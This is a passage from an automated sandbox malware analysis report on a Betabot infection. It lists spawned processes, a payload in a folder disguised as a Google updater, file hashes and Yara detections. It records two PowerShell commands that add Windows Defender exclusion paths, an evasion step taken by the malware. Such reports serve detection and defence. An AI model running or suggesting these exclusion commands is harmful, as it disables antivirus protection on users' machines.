                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Show Windows behavior

                                        File Activities

                                        Show Windows behavior

                                        Registry Activities

                                        Analysis Process: CpSHySoEfzH.exe PID: 3060 Parent PID: 3696

                                        General

                                        Start time:11:42:03
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Show Windows behavior

                                        File Activities

                                        Show Windows behavior

                                        Registry Activities

                                        Analysis Process: CpSHySoEfzH.exe PID: 4668 Parent PID: 3696

                                        General

                                        Start time:11:42:04
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Show Windows behavior

                                        File Activities

                                        Show Windows behavior

                                        Registry Activities

                                        Analysis Process: 9sek3aw7533q9.exe PID: 736 Parent PID: 3472

                                        General

                                        Start time:11:42:06
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Show Windows behavior

                                        File Activities

                                        Analysis Process: 9sek3aw7533q9.exe PID: 6208 Parent PID: 736

                                        General

                                        Start time:11:42:07
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:low
                                        Show Windows behavior

                                        File Activities

                                        Analysis Process: CpSHySoEfzH.exe PID: 4612 Parent PID: 3696

                                        General

                                        Start time:11:42:10
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Show Windows behavior

                                        File Activities

                                        Show Windows behavior

                                        Registry Activities

                                        Analysis Process: CpSHySoEfzH.exe PID: 2588 Parent PID: 3696

                                        General

                                        Start time:11:42:11
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Show Windows behavior

                                        File Activities

                                        Show Windows behavior

                                        Registry Activities

                                        Analysis Process: CpSHySoEfzH.exe PID: 1688 Parent PID: 3696

                                        General

                                        Start time:11:42:13
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Show Windows behavior

                                        File Activities

                                        Show Windows behavior

                                        Registry Activities

                                        Analysis Process: 9sek3aw7533q9.exe PID: 6576 Parent PID: 3472

                                        General

                                        Start time:11:42:14
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Show Windows behavior

                                        File Activities

                                        Analysis Process: CpSHySoEfzH.exe PID: 2248 Parent PID: 3696

                                        General

                                        Start time:11:42:15
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Analysis Process: 9sek3aw7533q9.exe PID: 6616 Parent PID: 6576

                                        General

                                        Start time:11:42:15
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        Analysis Process: CpSHySoEfzH.exe PID: 2188 Parent PID: 3696

                                        General

                                        Start time:11:42:16
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Analysis Process: CpSHySoEfzH.exe PID: 3332 Parent PID: 3696

                                        General

                                        Start time:11:42:18
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Analysis Process: CpSHySoEfzH.exe PID: 2036 Parent PID: 3696

                                        General

                                        Start time:11:42:20
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Analysis Process: 9sek3aw7533q9.exe PID: 6276 Parent PID: 3472

                                        General

                                        Start time:11:42:22
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: 9sek3aw7533q9.exe PID: 5704 Parent PID: 6276

                                        General

                                        Start time:11:42:23
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp, Author: Joe Security

                                        Analysis Process: 9sek3aw7533q9_1.exe PID: 6368 Parent PID: 3696

                                        General

                                        Start time:11:42:27
                                        Start date:10/03/2021
                                        Path:C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe
                                        Wow64 process (32bit):true
                                        Commandline:/suac
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 40%, ReversingLabs

                                        Analysis Process: iom7q73oi.exe PID: 6152 Parent PID: 3696

                                        General

                                        Start time:11:42:29
                                        Start date:10/03/2021
                                        Path:C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                                        Imagebase:0x400000
                                        File size:45056 bytes
                                        MD5 hash:08CDFD0D3A406601C42F087DA16EC6C8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Visual Basic
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 21%, ReversingLabs

                                        Analysis Process: 9sek3aw7533q9.exe PID: 5236 Parent PID: 3472

                                        General

                                        Start time:11:42:30
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Analysis Process: powershell.exe PID: 5840 Parent PID: 6152

                                        General

                                        Start time:11:42:31
                                        Start date:10/03/2021
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
                                        Imagebase:0x7ff679040000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET

                                        Analysis Process: powershell.exe PID: 4540 Parent PID: 6152

                                        General

                                        Start time:11:42:32
                                        Start date:10/03/2021
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
                                        Imagebase:0x7ff6bbfa0000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET

                                        Disassembly

                                        Code Analysis